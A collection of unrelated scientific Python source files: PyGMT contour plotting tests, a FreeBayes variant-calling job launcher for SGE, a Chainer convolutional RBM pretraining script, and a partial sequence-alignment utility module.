@pytest.mark.mpl_image_compare def test_contour_matrix(data, region): """ Plot data. """ fig = Figure() fig.contour(data=data, projection="X10c", region=region, frame="ag", pen=True) return fig @pytest.mark.mpl_image_compare def test_contour_from_file(region): """ Plot using the data file name instead of loaded data. """ fig = Figure() fig.contour( data=POINTS_DATA, projection="X10c", region=region, frame="af", pen="#ffcb87" ) return fig @pytest.mark.mpl_image_compare(filename="test_contour_vec.png") def test_contour_deprecate_columns_to_incols(region): """ Make sure that the old parameter "columns" is supported and it reports an warning. Modified from the test_contour_vec() test. """ fig = Figure() x, y = np.meshgrid( np.linspace(region[0], region[1]), np.linspace(region[2], region[3]) ) x = x.flatten() y = y.flatten() z = (x - 0.5 * (region[0] + region[1])) ** 2 + 4 * y ** 2 z = np.exp(-z / 10 ** 2 * np.log(2)) # generate dataframe # switch x and y from here onwards to simulate different column order data = np.array([y, x, z]).T with pytest.warns(expected_warning=FutureWarning) as record: fig.contour( data=data, projection="X10c", region=region, frame="a", pen=True, columns=[1, 0, 2], ) assert len(record) == 1 # check that only one warning was raised return fig
GenericMappingTools/gmt-python
pygmt/tests/test_contour.py
Python
bsd-3-clause
3,786
[ "Gaussian" ]
20fbff94d773ca97e3890934f4457c75723257d04beab2c3e4f08582819fd13d
''' Created on 07/31/2014 @Ronak Shah ''' import argparse import sys import time import os.path import stat from subprocess import Popen import shlex import shutil from datetime import date def main(): parser = argparse.ArgumentParser(prog='Run_FreeBayes.py', description='Run FreeBayes for Long Indels & MNPS (32bp-350bp)', usage='%(prog)s [options]') parser.add_argument("-pId", "--patientId", action="store", dest="patientId", required=True, metavar='PatientID', help="Id of the Patient for which the bam files are to be realigned") parser.add_argument("-tbam", "--tumorBAM", action="store", dest="tbam", required=True, metavar='tbam', help="Full Path to tumor bam file") parser.add_argument("-nbam", "--normalBAM", action="store", dest="nbam", required=True, metavar='nbam', help="Full Path to normal bam file") parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=True, help="make lots of noise [default]") parser.add_argument("-t", "--threads", action="store", dest="threads", required=True, metavar='1', help="Number of Threads to be used to run freebayes") parser.add_argument("-r", "--referenceFile", action="store", dest="ref", required=True, metavar='/somepath/Homo_Sapeins_hg19.fasta', help="Full Path to the reference file with the bwa index.") parser.add_argument("-floc", "--freebayes", action="store", dest="FREEBAYES", required=True, metavar='/somepath/bin/freebayes', help="Full Path to the freebayes executables.") parser.add_argument("-q", "--queue", action="store", dest="queue", required=False, metavar='all.q or clin.q', help="Name of the SGE queue") parser.add_argument("-o", "--outDir", action="store", dest="outdir", required=True, metavar='/somepath/output', help="Full Path to the output dir.") parser.add_argument("-of", "--outfile", action="store", dest="outfile", required=True, metavar='outputfilename', help="Outputfile name") parser.add_argument("-qsub", "--qsubPath", action="store", dest="qsub", required=True, metavar='/somepath/qsub', help="Full Path to the qsub executables of SGE.") parser.add_argument("-mapQ", "--mappingquality", action="store", dest="MAPQ", required=True, metavar='20', help="Mapping Quality Threshold") parser.add_argument("-baseQ", "--basequality", action="store", dest="BASEQ", required=True, metavar='20', help="BASE Quality Threshold") parser.add_argument("-mac", "--minimumAlternateCount", action="store", dest="MAC", required=True, metavar='2', help="Minimum Alternate Allele COunt") parser.add_argument("-maf", "--minimumAlternateFrequnecy", action="store", dest="MAF", required=True, metavar='0.01', help="Minimum Alternate Allele Frequency") parser.add_argument("-lai", "--leftAlignIndels", action="store_true", dest="lai", default=False, help="Pass if you wish to left align indels") args = parser.parse_args() if(args.verbose): print "I have Started the run for Freebayes." #(wd)= ProcessArgs(args) #if(wd.__ne__("NULL")): RunFreebayes(args) if(args.verbose): print "I have finished the run for Freebayes." def ProcessArgs(args): if(args.verbose): print "I am currently processing the arguments.\n" SampleDirName = args.patientId staticDir = "FreeBayesAnalysis" AnalysisDir = os.path.join(args.outdir,staticDir) SampleAnalysisDir = os.path.join(AnalysisDir,SampleDirName) if os.path.isdir(AnalysisDir): if(args.verbose): print "Dir:", AnalysisDir, " exists thus we wont be making it\n" else: os.mkdir(AnalysisDir) if os.path.isdir(SampleAnalysisDir): if(args.verbose): print "Dir:", SampleAnalysisDir," exists and we wont run the analysis\n" #return("NULL") else: os.mkdir(SampleAnalysisDir) if(args.verbose): print "I am done processing the arguments.\n" return(SampleAnalysisDir) def RunFreebayes(args): myPid = os.getpid() day = date.today() today = day.isoformat() today = today.replace("-","") #myPid = str(myPid) if(args.verbose): print "I am running freebayes for ", args.patientId, " using SGE" #Setting Job for SGE cmd = args.FREEBAYES + " -b " + args.tbam + " -b " + args.nbam + " -f " + args.ref + " -v " + args.outfile + " -I " + " -X " + " -O " + " -m " + args.MAPQ + " -q " + args.BASEQ + " -F " + args.MAF + " -C " + args.MAC + " -J --genotype-qualities" #print "CMD==>",cmd,"\n" qsub_cmd = args.qsub + " -q " + args.queue + " -N " + "Freebayes_"+args.patientId+"_"+str(myPid) + " -o " + "Freebayes_"+ args.patientId+"_"+str(myPid)+".stdout" + " -e " + "Freebayes_"+args.patientId+"_"+str(myPid)+".stderr" + " -V -l h_vmem=6G,virtual_free=6G -pe smp " + args.threads + " -wd " + args.outdir + " -sync y " + " -b y " + cmd print "QSUB_CMD==>", qsub_cmd , "\n" qsub_args = shlex.split(qsub_cmd) proc = Popen(qsub_args) proc.wait() retcode = proc.returncode if(retcode >= 0): if(args.verbose): print "I have finished running Freebayes for ", args.patientId, " using SGE" else: if(args.verbose): print "Freebayes is either still running or it errored out with return code", retcode,"\n" if __name__ == "__main__": start_time = time.time() main() end_time = time.time() print("Elapsed time was %g seconds" % (end_time - start_time))
rhshah/Exome-Pipeline
bin/Run_FreeBayes.py
Python
apache-2.0
5,474
[ "BWA" ]
986cc00a861e64de259e7d618ffc628598b7b1ffd7cb79811a94cb2e9a1ff97f
from __future__ import print_function import sys import cv2 import os import numpy as np import cPickle as pickle import timeit import time from argparse import ArgumentParser try: import PIL.Image as Image except ImportError: import Image import chainer from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils, Link, Chain, ChainList import chainer.functions as F import chainer.links as L from tools.prepare_data import load_data from tools.utils import tile_raster_images if __name__ == '__main__': """ Pre setup """ # Get params (Arguments) parser = ArgumentParser(description='SeRanet ConvolutionalRBM pre-training') parser.add_argument('--gpu', '-g', type=int, default=0, help='GPU ID (negative value indicates CPU)') parser.add_argument('--arch', '-a', default='seranet_v1', help='model selection (seranet_v1)') parser.add_argument('--level', '-l', type=int, default=1, help='Pretraining level') parser.add_argument('--batchsize', '-B', type=int, default=20, help='Learning minibatch size') parser.add_argument('--epoch', '-E', default=1000, type=int, help='Number of max epochs to learn') parser.add_argument('--color', '-c', default='rgb', help='training scheme for input/output color: (yonly, rgb)') parser.add_argument('--pcd', '-p', default=1, type=int, help='pcd_flag') parser.add_argument('--kcd', '-k', default=1, type=int, help='cd-k') #parser.add_argument('--real', '-r', default=0, type=int, # help='0: use binary unit (Bernoulli), 1: use real unit (Gaussian-Bernoulli)') lambda_w = 1.0 # weight decay p = 0.05 # sparsity rate lambda_s = 10.0 # sparsity args = parser.parse_args() n_epoch = args.epoch # #of training epoch batch_size = args.batchsize # size of minibatch visualize_test_img_number = 5 # #of images to visualize for checking training performance if args.gpu >= 0: cuda.check_cuda_available() xp = cuda.cupy if args.gpu >= 0 else np if args.color == 'yonly': inout_ch = 1 elif args.color == 'rgb': inout_ch = 3 else: raise ValueError('Invalid color training scheme') # Prepare model print('prepare model') if args.arch == 'seranet': import arch.seranet_split as model_arch model = model_arch.seranet_split(inout_ch=inout_ch) elif args.arch == 'seranet_v1': import arch.seranet_v1 as model_arch model = model_arch.seranet_v1_crbm(inout_ch=inout_ch, pretrain_level=args.level, k=args.kcd, pcd_flag=args.pcd, lambda_w=lambda_w, p=p, lambda_s=lambda_s) else: raise ValueError('Invalid architecture name') # Directory/File setting for training log arch_folder = model_arch.arch_folder # Directory/File setting for training log training_process_folder = os.path.join(arch_folder, args.color, 'pretraining_crbm_level' + str(args.level)) if args.level > 1: pretrained_model_path = os.path.join(arch_folder, args.color, 'pretraining_crbm_level' + str(args.level - 1), 'my.model') serializers.load_npz(pretrained_model_path, model) if not os.path.exists(training_process_folder): os.makedirs(training_process_folder) os.chdir(training_process_folder) train_log_file_name = 'train.log' train_log_file = open(os.path.join(training_process_folder, train_log_file_name), 'w') #total_image_padding = 14 #24 #18 #14 """ Load data """ print('loading data') datasets = load_data(mode=args.color) np_train_dataset, np_valid_dataset, np_test_dataset = datasets np_train_set_x, np_train_set_y = np_train_dataset np_valid_set_x, np_valid_set_y = np_valid_dataset np_test_set_x, np_test_set_y = np_test_dataset n_train = np_train_set_x.shape[0] n_valid = np_valid_set_x.shape[0] n_test = np_test_set_x.shape[0] """ Preprocess """ #print('preprocess') start_time = timeit.default_timer() def normalize_image(np_array): np_array /= 255. np_array.astype(np.float32) normalize_image(np_train_set_x) normalize_image(np_valid_set_x) normalize_image(np_test_set_x) normalize_image(np_train_set_y) normalize_image(np_valid_set_y) normalize_image(np_test_set_y) end_time = timeit.default_timer() print('preprocess time %i sec' % (end_time - start_time)) print('preprocess time %i sec' % (end_time - start_time), file=train_log_file) """ Setup GPU """ """ Model, optimizer setup """ print('setup model') if args.gpu >= 0: cuda.get_device(args.gpu).use() model.to_gpu() # optimizer = optimizers.Adam(alpha=0.001) optimizer = optimizers.AdaDelta() # optimizer = optimizers.MomentumSGD(lr=0.0001, momentum=0.5) # 0.0001 -> value easily explodes optimizer.setup(model) """ TRAINING Early stop method is used for training to avoid overfitting, Reference: https://github.com/lisa-lab/DeepLearningTutorials """ print('training') patience = 30000 patience_increase = 2 improvement_threshold = 0.995 # 0.997 validation_frequency = min(n_train, patience // 2) * 2 best_validation_loss = np.inf iteration = 0 best_iter = 0 test_score = 0. done_looping = False plotting_time = 0. x_batch = model.preprocess_x(np_train_set_x[0: 0 + batch_size]) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) model.init_persistent_params(x) for epoch in xrange(1, n_epoch + 1): print('epoch: %d' % epoch) start_time = timeit.default_timer() perm = np.random.permutation(n_train) sum_loss = 0 for i in xrange(0, n_train, batch_size): # start_iter_time = timeit.default_timer() iteration += 1 if iteration % 1000 == 0: print('training @ iter ', iteration) x_batch = np_train_set_x[perm[i: i + batch_size]].copy() #x_batch = xp.asarray(train_scaled_x[perm[i: i + batch_size]]) #y_batch = xp.asarray(np_train_set_y[perm[i: i + batch_size]]) x_batch = model.preprocess_x(x_batch) # print('x_batch', x_batch.shape, x_batch.dtype) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) optimizer.update(model, x) sum_loss += float(model.loss.data) * batch_size # end_iter_time = timeit.default_timer() # print("iter took: %f sec" % (end_iter_time - start_iter_time)) # GPU -> iter took: 0.138625 sec print("train mean loss: %f" % (sum_loss / n_train)) print("train mean loss: %f" % (sum_loss / n_train), file=train_log_file) # Validation sum_loss = 0 for i in xrange(0, n_valid, batch_size): x_batch = np_valid_set_x[i: i + batch_size] x_batch = model.preprocess_x(x_batch) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) sum_loss += float(model(x).data) * batch_size this_validation_loss = (sum_loss / n_valid) print("valid mean loss: %f" % this_validation_loss) print("valid mean loss: %f" % this_validation_loss, file=train_log_file) if this_validation_loss < best_validation_loss: if this_validation_loss < best_validation_loss * improvement_threshold: patience = max(patience, iteration * patience_increase) print('update patience -> ', patience, ' iteration') best_validation_loss = this_validation_loss best_iter = iteration sum_loss = 0 for i in xrange(0, n_test, batch_size): x_batch = np_test_set_x[i: i + batch_size] x_batch = model.preprocess_x(x_batch) x = Variable(xp.asarray(x_batch, dtype=xp.float32)) sum_loss += float(model(x).data) * batch_size test_score = (sum_loss / n_test) print(' epoch %i, test cost of best model %f' % (epoch, test_score)) print(' epoch %i, test cost of best model %f' % (epoch, test_score), file=train_log_file) # Save best model print('saving model') serializers.save_npz('my.model', model) serializers.save_npz('my.state', optimizer) if patience <= iteration: done_looping = True print('done_looping') break end_time = timeit.default_timer() print('epoch %i took %i sec' % (epoch, end_time - start_time)) print('epoch %i took %i sec' % (epoch, end_time - start_time), file=train_log_file) # Construct image from the weight matrix n_chains = 20 n_samples = 10 weight = model.get_target_crbm().conv.W.data[:, 0:1, ...] ksize = model.get_target_crbm().ksize if args.gpu >= 0: weight = cuda.to_cpu(weight) if epoch < 10 or epoch % 10 == 0: print(' ... plotting RBM weight') image = Image.fromarray( tile_raster_images( # X=rbm.W.get_value(borrow=True).T, X=weight, img_shape=(ksize, ksize), tile_shape=(10, 20), tile_spacing=(1, 1) ) ) image.save('filters_at_epoch%i.png' % epoch) if args.level == 1 and (epoch < 10 or epoch % 10 == 0): """ SAMPLING FROM the RBM """ print(' ... plotting RBM reconstruct data') image_size = 116 image_data = np.zeros( # ((image_size + 1) * n_samples + 1, (image_size + 1) * n_chains - 1), ((image_size + 1) * n_chains + 1, (image_size + 1) * n_samples - 1), dtype='uint8' ) reconstruct_x = Variable(xp.asarray(np_train_set_x[0: 0 + n_samples], dtype=xp.float32)) for idx in xrange(n_chains): image_piece = reconstruct_x.data[:, 0:1, ...] if args.gpu >= 0: image_piece = cuda.to_cpu(image_piece) image_data[(image_size + 1) * idx:(image_size + 1) * idx + image_size, :] = tile_raster_images( X=image_piece, img_shape=(image_size, image_size), tile_shape=(1, n_samples), tile_spacing=(1, 1) ) # h1_mean, h1_sample, v1_mean, reconstruct_x = rbm.gibbs_vhv(reconstruct_x) reconstruct_x = model.get_target_crbm().reconstruct(reconstruct_x) image = Image.fromarray(image_data) image.save('samples_reconstruct_epoch%i.png' % epoch) image_data = np.zeros( # ((image_size + 1) * n_samples + 1, (image_size + 1) * n_chains - 1), ((image_size + 1) * n_chains + 1, (image_size + 1) * n_samples - 1), dtype='uint8' ) reconstruct_x = Variable(xp.asarray(np_train_set_x[0: 0 + n_samples], dtype=xp.float32)) for idx in xrange(n_chains): image_piece = reconstruct_x.data[:, 0:1, ...] if args.gpu >= 0: image_piece = cuda.to_cpu(image_piece) image_data[(image_size + 1) * idx:(image_size + 1) * idx + image_size, :] = tile_raster_images( X=image_piece, img_shape=(image_size, image_size), tile_shape=(1, n_samples), tile_spacing=(1, 1) ) h1_mean, h1_sample, v1_mean, reconstruct_x = model.get_target_crbm().gibbs_vhv(reconstruct_x) image = Image.fromarray(image_data) image.save('samples_gibbs_vhv_epoch%i.png' % epoch) end_time = timeit.default_timer() pretraining_time = (end_time - start_time) - plotting_time print('Training took %i min %i sec' % (pretraining_time / 60., pretraining_time % 60))
corochann/SeRanet
src/pretrain_crbm.py
Python
mit
12,398
[ "Gaussian" ]
9c83df9abb82e1aa55c7b708bb38f45f89a782b081fae80ef649236b9f10593e
from functools import * import pandas as pd import itertools try: from Bio import SeqIO, pairwise2, Phylo except ImportError: pass try: import dendropy from dendropy import treecalc except ImportError: pass from copy import deepcopy from HLAPredCache import * import subprocess import tempfile import os # from aacolors import hydrophobicity, chemistry, taylor from adjustwithin import adjustnonnan import scipy.special import sys import numpy as np import re from skbio.alignment import StripedSmithWaterman, make_identity_substitution_matrix from objhist import objhist from seqdistance import hamming_distance, seq_distance from seqdistance.matrices import addGapScores, binarySubst, nanGapScores """Utility functions that I sometimes depend on for sequence analysis. Most are old dependencies. If you can't find something, it may still be in the SVN repo 'scripts/util/seqtools_old.py' file.""" __all__ = ['BADAA', 'AALPHABET', 'AA2CODE', 'CODE2AA', 'isvalidpeptide', 'cleanAlign', 'cleanDf', 'removeBadAA', 'padAlignment', 'consensus', 'identifyMindist', 'peptideSetCoverage', 'fasta2df', 'df2fasta', 'align2fasta', 'align2mers', 'align2mers_tracked', 'fasta2align', 'sliceAlign', 'kmerSlice', 'alignmentEntropy', 'generateAlignment', 'fasta2seqs', 'seqs2fasta', 'catAlignments', 'mynorm', 'aalogoheights', 'computeAlignmentLogoHeights', 'pairwiseDiversity', 'pairwiseDiversityInterGroup', '_PD', '_PD_hamming', 'pairwiseMutualInformation', 'seqmat2align', 'align2mat', 'align2aamat', 'condenseGappyAlignment', 'nx2sif', 'kmerConsensus', 'pepComp', 'tree2pwdist', 'overlappingKmers', 'getStartPos', 'getStartPosMapper'] BADAA = '-*BX#Z' AALPHABET = 'ACDEFGHIKLMNPQRSTVWY' AA2CODE = {aa:i for i, aa in enumerate(AALPHABET)} AA2CODE.update({'-':21}) CODE2AA = {i:aa for i, aa in enumerate(AALPHABET)} CODE2AA.update({21:'-'}) def isvalidpeptide(mer, badaa=None): """Test if the mer contains an BAD amino acids in global BADAA typically -*BX#Z""" if badaa is None: badaa = BADAA if not mer is None: return not re.search('[%s]' % badaa, mer) else: return False def cleanAlign(align, badaa=None): """Remove all invalid sequences (containing badaa) from the alignment badaa is '-*BX#Z' by default""" return align.loc[[isvalidpeptide(s, badaa) for s in align]] def cleanDf(df, badaa=None): """Remove all invalid sequences (containing badaa) from the alignment badaa is '-*BX#Z' by default""" return df.loc[[isvalidpeptide(s, badaa) for s in df.seq]] def removeBadAA(mer,badaa=None): """Remove badaa amino acids from the mer, default badaa is -*BX#Z""" if badaa is None: badaa = BADAA if not mer is None: return re.sub('[%s]' % badaa, '', mer) else: return mer def _seq2vec(seq): """Convert AA sequence into numpy vector of integers for fast comparison""" vec = np.zeros(len(seq), dtype=int) for aai, aa in enumerate(seq): vec[aai] = AA2CODE[aa] return vec def padAlignment(align, applyPadding=True): """Given an iterator of sequences, convert to pd.Series Remove * or # from the end and pad sequences of different length with gaps There is a warning if gaps are used for padding Returns the align obj as pd.Series""" if type(align) in [dict, np.ndarray, list]: align = pd.Series(align) """Replace * and # with - and - """ for ind in align.index: if '*' in align[ind]: align[ind] = align[ind].replace('*', '-') if '#' in align[ind]: align[ind] = align[ind].replace('#', '-') """Pad with gaps if the lengths are all the same""" if applyPadding: L = align.map(len).unique() if len(L) > 1: #print 'Sequences have different lengths (pading with gaps): %s' % L L = L.max() for ind in align.index: if len(align[ind]) < L: align[ind] = align[ind].ljust(L, '-') else: L = L.max() return align def consensus(align, ignoreGaps=True): """Return a consensus sequence from the sequences in seqs seqs can be a dict or a pd.Series of sequence strings ignoresGaps unless all AA are gaps""" align = padAlignment(align) L = len(align[align.index[0]]) cons = '' for aai in np.arange(L): counts = objhist([seq[aai] for seq in align]) if ignoreGaps and len(counts)>1: droppedGaps = counts.pop('-', 0) cons += max(list(counts.keys()), key=counts.get) return cons def identifyMindist(align, ignoreGaps=True): """Compute a consensus sequence and return the sequence in the alignment with the smallest (hamming) distance Parameters ---------- align : list or pd.Series Sequence alignment. ignoreGaps : bool Passed to consensus, specifies whether gap characters are ignored for computing consensus. Returns ------- seq : str One of the sequences in align.""" align = padAlignment(align) cons = consensus(align, ignoreGaps) dist = align.map(partial(hamming_distance, cons)) return align[dist.argmin()] def peptideSetCoverage(peptides1,peptides2,mmTolerance=1): """Returns a dict that reports the fraction of peptides in peptides2 that are covered by each peptide in peptides1 by matching within a tolerance of mmTolerance. Key 'tot' indicates the cumulative coverage that peptides1 provide of peptides2 as a fraction of peptides2 Call with unique(peptides2) if Q is the fraction of unique peptides or not if Q is fraction of representative population. Note: Can be used as a non-symetric distance between two peptide sets""" oh1 = objhist(peptides1) coveredPeps = {k:[] for k in set(oh1.keys())} coveredPeps.update({'tot':[]}) cache = {} for pep2 in peptides2: anyCover = False for pep1 in set(peptides1): try: dist = cache[(pep1, pep2)] except KeyError: dist = seq_distance(pep1, pep2, subst=binarySubst, normed=False) cache.update({(pep1, pep2):dist,(pep2, pep1):dist}) if dist <= mmTolerance: coveredPeps[pep1].append(pep2) anyCover = True if anyCover: coveredPeps['tot'].append(pep2) coverage={k:len(v)/len(peptides2) for k, v in list(coveredPeps.items())} return coverage def fasta2seqs(fn): return [str(r.seq) for r in SeqIO.parse(open(fn, 'r'), 'fasta')] def seqs2fasta(seqs, fn): with open(fn, 'w') as fh: for i, s in enumerate(seqs): fh.write('>seq%d\n' % i) fh.write('%s\n' % s) def fasta2df(fn, sep='.', columns=['clade', 'country', 'year', 'name', 'seqid'], index=None, uniqueIndex=True): """Read in a fasta file and turn it into a Pandas DataFrame Defaults parse the HIV LANL fasta alignments. Parameters ---------- sep : str Separator in the description field. columns : list List of the sep delimited column names in-order. index : str Column to use as the DataFrame index (default: None) Returns ------- seqDf : pd.DataFrame All sequences from the fasta file with a seq column containing the sequences.""" with open(fn, 'r') as fh: records = SeqIO.parse(fh, 'fasta') sDict = {'seq':[]} sDict.update({k:[] for k in columns}) for r in records: sDict['seq'].append(str(r.seq)) info = r.description.split(sep) for i in np.arange(len(columns)): if i < len(info): sDict[columns[i]].append(info[i]) else: sDict[columns[i]].append('') seqDf = pd.DataFrame(sDict) if not index is None: if seqDf.shape[0] == seqDf[index].unique().shape[0] or not uniqueIndex: """If the index is unique fine, otherwise make a unique index by appending _%d""" seqDf = seqDf.set_index(index) else: tmp = seqDf[index].copy() for i, ind in enumerate(tmp.index): tmp[ind] = '%d_%s' % (i, tmp[ind]) seqDf = seqDf.set_index(tmp) return seqDf def df2fasta(df, fn, sep='.', columns=None): """Writes the Df from fasta2df back to a FASTA file""" if columns is None: columns = list(df.columns) if 'seq' in columns: columns.remove('seq') with open(fn, 'w') as fh: for ind, row in df.iterrows(): label = '>%s' % ind for col in columns: label += '%s%s' % (sep, row[col]) fh.write('%s\n' % label) fh.write('%s\n' % row['seq']) def align2fasta(align, fn, applyPadding = True): """Write align to a FASTA file where align is a dict or pd.Series of sequences""" align = padAlignment(align, applyPadding) with open(fn, 'w') as fh: for i in np.arange(align.shape[0]): ind = align.index[i] fh.write('>%s\n' % ind) fh.write('%s\n' % align.iloc[i]) def align2mers(align, fn=None, nmers=[9]): """Compute all nmers in align and write to a mers file for prediction""" align = padAlignment(align) mers = [] for seq in align: mers.extend(getMers(re.sub('[%s]' % BADAA, '', seq), nmers)) mers=set(mers) if not fn is None: with open(fn, 'w') as fh: for pep in mers: fh.write('%s\n' % pep) else: return list(mers) def align2mers_tracked(align, nmers=[9], firstOnly=True): """Return a df of all nmers in the alignment along with start position and seq index""" align = padAlignment(align) cols = ['peptide', 'starti', 'seqi', 'L', 'count'] outD = {k:[] for k in cols} for k in nmers: for seqi, seq in enumerate(align): for starti in range(len(seq)-k+1): mer = grabKmer(seq, starti, k)[1] if not mer is None: if not firstOnly or not mer in outD['peptide']: outD['peptide'].append(mer) outD['starti'].append(starti) outD['seqi'].append(align.index[seqi]) outD['L'].append(k) outD['count'].append(1) else: ind = outD['peptide'].index(mer) outD['count'][ind] += 1 return pd.DataFrame(outD)[cols] def fasta2align(fn,uniqueIndex=True): """Read sequences from a FASTA file and store in a pd.Series object indexed by the description""" return fasta2df(fn, sep=None, columns=['name'], index='name', uniqueIndex=uniqueIndex).seq def sliceAlign(align,region,sites=False): """Return a region of the alignment where region is (start, end) OR if sites is True then include all sites in region (not range)""" if region is None: return align elif sites: return align.map(lambda seq: ''.join([seq[r] for r in region])) else: return align.map(lambda seq: seq[region[0]:region[1]]) def kmerSlice(align,starti,k,gapped=True): """Return a slice of an alignment specified by kmer start position. Uses grabKmer to return "gapped" or "non-gapped" kmers. Note: Using non-gapped slices can return None when kmer begins with a gap or if is near the end and there are insufficient non-gap characters""" if gapped: grabKmerFlag = 0 else: grabKmerFlag = 1 return align.map(lambda s: grabKmer(s, starti, k)[grabKmerFlag]) def alignmentEntropy(align, statistic='absolute', removeGaps=False, k=1, logFunc=np.log): """Calculates the entropy in bits of each site (or kmer) in a sequence alignment. Also can compute: - "uniqueness" which I define to be the fraction of unique sequences - "uniquenum" which is the number of unique sequences Parameters ---------- align : pd.Series() or list Alignment of sequences. statistic : str Statistic to be computed: absolute, uniqueness Uniqueness is the fraction of unique sequences. Uniquenum is the number of unique AA at each position. removeGaps : bool Remove from the alignment at each position, kmers that start with a gap character. Also use "non-gapped kmers" (ie skipping gaps) k : int Length of the kmer to consider at each start position in the alignment. (default 1 specifies site-wise entropy) logFunc : function Default is natural log, returning nats. Can also use log2 for bits. Return ------ out : float Output statistic.""" if removeGaps: grabKmerFlag = 1 else: grabKmerFlag = 0 align = padAlignment(align) L = len(align[align.index[0]]) nKmers = L - k + 1 entropy = np.zeros(nKmers, dtype=float) for aai in np.arange(nKmers): kmers = [grabKmer(seq, aai, k)[grabKmerFlag] for seq in align] """kmers that start with a gap or that are at the end and are of insufficent length, will be None""" kmers = [mer for mer in kmers if not mer is None] oh = objhist(kmers) if statistic == 'absolute': entropy[aai] = oh.entropy() elif statistic == 'uniqueness': entropy[aai] = oh.uniqueness() elif statistic == 'uniquenum': entropy[aai] = len(list(oh.keys())) return entropy def generateAlignment(seqs): """Use MUSCLE to align the seqs. muscle -in new_seqs.fa -out new_seqs.afa Parameters ---------- seqs : list Return ------ align : pd.Series() Aligned sequences. """ """Create temporary file for MUSCLE""" inFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) outFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) """Creates an align object or pd.Series() with indexing to preserve order but does not appyl padding""" align = padAlignment(seqs, applyPadding=False) """Put alignments in the tempfiles""" align2fasta(seqs, inFn, applyPadding=False) muscleCommand = ['muscle', '-in', inFn, '-out', outFn] result = subprocess.call(muscleCommand) """If MUSCLE was successful""" if not result: outAlign = fasta2align(outFn) else: print("Error in MUSCLE!") raise Exception("MUSCLEError") """Remove the temporary files""" os.remove(inFn) os.remove(outFn) """MUSCLE seqs need to be reorderd using the original index""" outAlign = outAlign.loc[[str(i) for i in align.index]] """Index was str() through FASTA files so reset index with original index""" outAlign.index = align.index """Check that all seqs are being returned in the correct order""" badSeqs = 0 if not len(seqs) == len(outAlign): print('Different number of output seqs!') badSeqs+=1 for i, s1, s2 in zip(np.arange(len(seqs)), seqs, outAlign): if not s1.replace('-', '') == s2.replace('-', ''): print('%d: %s != %s' % (i, s1, s2)) badSeqs+=1 if badSeqs>0: raise Exception('Output seqs are different than input seqs! (%d)' % badSeqs) return outAlign def catAlignments(alignA, alignB): """ Take two dict or pd.Series as alignments and combine using MUSCLE Return a pd.Series of all aligned sequences indexed by original seq keys (keys are suffixed with A or B if neccessary) From MUSCLE documentation: To align one sequence to an existing alignment: muscle -profile -in1 existing_aln.afa -in2 new_seq.fa -out combined.afa If you have more than one new sequences, you can align them first then add them, for example: muscle -in new_seqs.fa -out new_seqs.afa muscle -profile -in1 existing_aln.afa -in2 new_seqs.afa -out combined.afas """ """Create temporary files for MUSCLE to work on the two alignments""" aFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) bFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) outFn = tempfile.mktemp(prefix='tmp_align', suffix='.fasta', dir=None) """Make sure alignments have the same length and are Series objects""" alignA = padAlignment(alignA) alignB = padAlignment(alignB) """Put alignments in the tempfiles""" align2fasta(alignA, aFn) align2fasta(alignB, bFn) muscleCommand = ['muscle', '-profile', '-in1', aFn, '-in2', bFn, '-out', outFn] result = subprocess.call(muscleCommand) """If MUSCLE was successful""" if not result: outAlign = fasta2align(outFn) else: print("Error in MUSCLE!") raise Exception("MUSCLEError") """ except: pass os.remove(aFn) os.remove(bFn) os.remove(outFn) raise """ """Remove the temporary files""" os.remove(aFn) os.remove(bFn) os.remove(outFn) return outAlign def mynorm(vec, mx=1, mn=0): """Normazlize values of vec in-place to [mn, mx] interval""" vec -= np.nanmin(vec) vec = vec/np.nanmax(vec) vec = vec*(mx-mn)+mn return vec def aalogoheights(aahistObj, N=20): """For a objhist of AA frequencies, compute the heights of each AA for a logo plot""" aahistObj = deepcopy(aahistObj) keys = list(aahistObj.keys()) for aa in BADAA: if aa in keys: dummy = aahistObj.pop(aa) keys = [aa for aa in aahistObj.sortedKeys(reverse=False)] freq = aahistObj.freq() p = np.array([freq[k] for k in keys]) #err = (1/np.log(2))*((N-1) / (2*aahistObj.sum())) #totEntropy = np.log2(N)-((-p*np.log2(p)).sum() + err) totEntropy = np.log2(N)-((-p*np.log2(p)).sum()) heights = p * totEntropy return keys, heights def computeAlignmentLogoHeights(fullAlign, region=None): """Compute heights for a sequence logo plot of relative entropy Returns a vector of heights""" fullAlign = padAlignment(fullAlign) align = sliceAlign(fullAlign, region) L = len(align[align.index[0]]) tot = np.zeros(L) for sitei in np.arange(L): aaHist = objhist([seq[sitei] for seq in align]) aaKeys, entropy = aalogoheights(aaHist) tot[sitei] = entropy.sum() return tot def pairwiseDiversity(fullAlign,region=None,subst=None,bySite=True): """Calculate sitewise pairwise diversity for an alignment By default it will use a "hamming" substitution matrix All gap comparisons are nan if bySite is False then compute single PD based on whole-sequence distances Return the fraction of valid (non-gap) pairwise comparisons at each site that are AA matched""" fullAlign = padAlignment(fullAlign) align = sliceAlign(fullAlign, region) L = len(align[align.index[0]]) if subst is None: _PD_hamming(align, None, subst, bySite, True) return _PD(align, None, subst, bySite, True) def pairwiseDiversityInterGroup(align1, align2, region=None, subst=None, bySite=True): """Calculate pairwise diversity between two alignments By default it will use a "hamming" substitution matrix All gap comparisons are nan if bySite is False then compute single PD based on whole-sequence distances Return the fraction of valid (non-gap) pairwise comparisons at each site that are AA matched""" """Does not perform "padding" so alignments must have same sequence lengths""" align1 = sliceAlign(align1, region) align2 = sliceAlign(align2, region) L = len(align[align.index[0]]) if subst is None: _PD_hamming(align1, align2, subst, bySite, False) return _PD(align1, align2, subst, bySite, False) def _PD(alignA, alignB, subst, bySite, withinA): """Computation for pairwise diversity""" L = len(alignA.iloc[0]) """Dist will be 1 where equal, 0 where not and nan if one is a gap""" if withinA: dist = np.zeros((int(scipy.special.comb(len(alignA), 2)), L)) allPairs = itertools.combinations(alignA, 2) else: dist = np.zeros((len(alignA)*len(alignB), L)) allPairs = itertools.product(alignA, alignB) j = 0 for seq1, seq2 in allPairs: """This line is the bottleneck. I should try some optimization here. This would help with all distance functions""" 